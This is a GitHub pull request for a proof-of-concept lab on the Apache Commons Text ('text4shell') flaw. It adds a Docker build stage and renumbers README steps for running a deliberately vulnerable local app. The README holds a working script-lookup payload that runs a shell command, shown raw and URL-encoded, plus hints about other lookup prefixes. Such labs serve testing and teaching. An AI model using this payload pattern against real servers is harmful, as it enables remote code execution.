Skip to content

feat: streamline testing process by including build step in docker #4

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

feat: streamline testing process by including build step in docker #4

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
74d0319
feat: streamline testing process by including build step in docker
janhartje Nov 14, 2022
8b6e3e8
fix: remove latest tag from maven
janhartje Nov 14, 2022
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 8 additions & 2 deletions Dockerfile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,3 +1,9 @@
# Build the jar File
FROM maven:3.8.6-eclipse-temurin-8-alpine as build
WORKDIR /app
COPY . /app
RUN mvn clean install

# Use an official OpenJDK runtime as a parent image
FROM openjdk:8-jre-alpine

Expand All @@ -9,10 +15,10 @@ RUN apk update && apk add bash
WORKDIR /app

# Copy the fat jar into the container at /app
COPY /target/text4shell-poc.jar /app
COPY --from=build /app/target/text4shell-poc.jar /app

# Make port 8080 available to the world outside this container
EXPOSE 8080

# Run jar file when the container launches
CMD ["java", "-jar", "text4shell-poc.jar"]
CMD ["java", "-jar", "text4shell-poc.jar"]
28 changes: 11 additions & 17 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,61 +1,55 @@
### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)
-------------

---

1. Maven install to create the fat jar

```
mvn clean install
```

2. Docker build
1. Docker build

```
docker build --tag=text4shell .
```

3. Docker run
2. Docker run

```
docker run -p 80:8080 text4shell
```

4. Test the app
3. Test the app

```
http://localhost/text4shell/attack?search=<anything>
```

5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:

```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

6. You can also try using `dns` or `url` prefixes.
5. You can also try using `dns` or `url` prefixes.

7. Get the container id
6. Get the container id

```
docker container ls
```

8. Get into the app
7. Get into the app

```
docker exec -it <container_id> bash
```

9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):

```
ls /tmp/
```

10. To stop the container
9. To stop the container

```
docker container stop <container_id>
```
```